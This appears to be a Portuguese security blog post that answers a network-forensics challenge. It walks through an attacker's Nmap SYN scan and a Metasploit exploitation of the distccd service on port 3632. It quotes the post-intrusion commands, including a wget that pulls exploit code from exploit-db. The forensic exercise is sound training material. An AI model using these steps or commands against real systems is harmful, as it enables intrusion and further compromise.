Revelaremos agora a resposta do último Desafio SegInfo, publicado em 23 de setembro de 2014 aqui no blog.
– Qual foi o primeiro scan realizado? Qual ferramenta foi utilizada? Quais portas foram escaneadas?
R: Syn Scan utilizando Nmap nas portas 1-65534.
– Quais os IPs do atacante e da vítima?
R: Atacante: 192.168.56.102, Vítima: 192.168.56.101
– Um segundo scan foi realizado. Qual(is) porta(s) foi(ram) escaneada(s)? Qual o serviço vulnerável?
R: Porta 3632. Serviço distccd. Através do serviço foi executado um script ruby e aberto socket na porta 4444. A ferramenta utilizada foi o Metasploit Framework.
– Quais comandos foram inseridos após a invasão ter sido efetuada?
R: cd /tmp, uname -a, whoami, wget http://www.exploit-db.com/download/15704 -O 15704.c e ls -l
Parabéns por resolver o desafio da Clavis Segurança da Informação. É isso pessoal, até o próximo desafio! (:
Conheça o curso sobre Análise de Malware em Forense Computacional oferecido pela Academia Clavis!